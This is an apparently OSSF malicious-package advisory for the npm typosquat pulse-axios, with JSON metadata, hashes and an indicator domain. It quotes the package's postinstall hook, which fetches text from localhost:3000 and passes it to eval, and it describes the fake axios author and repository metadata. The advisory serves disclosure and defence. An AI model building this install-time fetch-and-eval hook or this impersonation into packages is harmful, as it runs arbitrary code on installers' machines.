MAL-2026-4651
Vulnerability from ossf_malicious_packages
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (c64dad53e23f7fcba3813e9ae6caee3f9461f5e52194165da668e5332e78bb99)
pulse-axios@1.16.1 declares a postinstall hook (`node./lib/core/eval.js`) that on `npm install` issues `fetch('http://localhost:3000/download/data')`, reads the response body as text, and passes it to `eval` inside an async IIFE: `await eval(\`(async () => {\n${datab2}\n})();\`)`. Errors are silently swallowed in an empty catch. Any bytes returned by whatever process is listening on port 3000 at install time — including any local attacker process, a co-installed malicious package's helper, or a developer-staging payload server — execute with the installer's privileges. The package additionally impersonates the legitimate `axios` package: `name: pulse-axios`, description claims to be "a faster and better version of axios", `author` is set to `Matt Zabriskie` (the real axios maintainer), `repository.url` points to `https://github.com/axios/axios.git`, and `homepage` is `https://axios-http.com`. The metadata theft is designed to fool installers into believing this is a legitimate axios variant. Combined, the package is a typosquat lure that ships an install-time RCE primitive.
{
"affected": [
{
"database_specific": {
"cwes": [
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
],
"indicators": {
"domains": [
"consequences-faces-weblogs-clinical.trycloudflare.com"
],
"evidence_files": [
{
"path": "lib/core/eval.js",
"sha256": "ec84bb94f37b0021bcea38c9b1e5c326dda236d4e9c83bfc11093e597d23a9fe",
"tlsh": "21e026aa303f26754f7123f89d57180ff722b31b76c4c1c5f39486048e326a14945e5d"
},
{
"path": "package.json",
"sha256": "19649e1b8bf32423969ba39b72913c934844eb6a991ddc1a0493a3a243706dc9",
"tlsh": "b2d1ec73c9ca4d572fb47aa8a87a9264f231c30fa551c90fb07e024c4f7572f129762a"
}
],
"package_integrity": [
{
"filename": "pulse-axios-1.17.2.tgz",
"hashes": {
"sha1": "f81c5e006cfe568db6d2524dca71a86c859d392b",
"sha512_sri": "sha512-V65XeJl04Q9VAFB6bsNTktIN64Qiw/qc9LLj4m6UFRRUSzI+5eUP3s23lP8fXnwa8a2tsMToPZGCdq/sApsSig=="
}
}
]
}
},
"package": {
"ecosystem": "npm",
"name": "pulse-axios"
},
"versions": [
"1.17.2",
"1.17.1",
"1.16.1"
]
}
],
"credits": [
{
"contact": [
"actran@amazon.com"
],
"name": "Amazon Inspector",
"type": "FINDER"
}
],
"database_specific": {
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-003766",
"import_time": "2026-05-26T05:51:16.460920647Z",
"modified_time": "2026-05-21T06:54:36Z",
"sha256": "28257d4309df99e3d275ee13a8070e9be516444fc5a5e954c864cbf7d7b1f89c",
"source": "amazon-inspector",
"versions": [
"1.17.2"
]
},
{
"id": "IN-MAL-2026-003389",
"import_time": "2026-05-26T05:50:32.977313736Z",
"modified_time": "2026-05-20T02:00:14Z",
"sha256": "5697e55222985697b89b9d1755984516563ff0a30218ac331c34aee46f3f1d07",
"source": "amazon-inspector",
"versions": [
"1.17.1"
]
},
{
"id": "IN-MAL-2026-003767",
"import_time": "2026-05-26T05:51:16.556905649Z",
"modified_time": "2026-05-21T06:54:36Z",
"sha256": "a04cbfa8262f2b1fc518a4124a825108b1895b24e6222a1306c57c136aa180a7",
"source": "amazon-inspector",
"versions": [
"1.17.2"
]
},
{
"id": "IN-MAL-2026-003385",
"import_time": "2026-05-26T05:50:32.522011889Z",
"modified_time": "2026-05-20T01:56:30Z",
"sha256": "c64dad53e23f7fcba3813e9ae6caee3f9461f5e52194165da668e5332e78bb99",
"source": "amazon-inspector",
"versions": [
"1.16.1"
]
},
{
"id": "IN-MAL-2026-003390",
"import_time": "2026-05-26T05:50:33.070727028Z",
"modified_time": "2026-05-20T02:00:14Z",
"sha256": "d53e7eba89c2c1763024ac4b829f4f12f5e5f901a407c4fc7b157417aec557f1",
"source": "amazon-inspector",
"versions": [
"1.17.1"
]
}
]
},
"details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (c64dad53e23f7fcba3813e9ae6caee3f9461f5e52194165da668e5332e78bb99)\npulse-axios@1.16.1 declares a postinstall hook (`node./lib/core/eval.js`) that on `npm install` issues `fetch(\u0027http://localhost:3000/download/data\u0027)`, reads the response body as text, and passes it to `eval` inside an async IIFE: `await eval(\\`(async () =\u003e {\\n${datab2}\\n})();\\`)`. Errors are silently swallowed in an empty catch. Any bytes returned by whatever process is listening on port 3000 at install time \u2014 including any local attacker process, a co-installed malicious package\u0027s helper, or a developer-staging payload server \u2014 execute with the installer\u0027s privileges. The package additionally impersonates the legitimate `axios` package: `name: pulse-axios`, description claims to be \"a faster and better version of axios\", `author` is set to `Matt Zabriskie` (the real axios maintainer), `repository.url` points to `https://github.com/axios/axios.git`, and `homepage` is `https://axios-http.com`. The metadata theft is designed to fool installers into believing this is a legitimate axios variant. Combined, the package is a typosquat lure that ships an install-time RCE primitive.\n",
"id": "MAL-2026-4651",
"modified": "2026-05-26T05:55:04Z",
"published": "2026-05-20T01:56:30Z",
"references": [
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/pulse-axios/v/1.17.2"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/pulse-axios/v/1.17.1"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/pulse-axios/v/1.16.1"
}
],
"schema_version": "1.7.4",
"summary": "Malicious code in pulse-axios (npm)"
}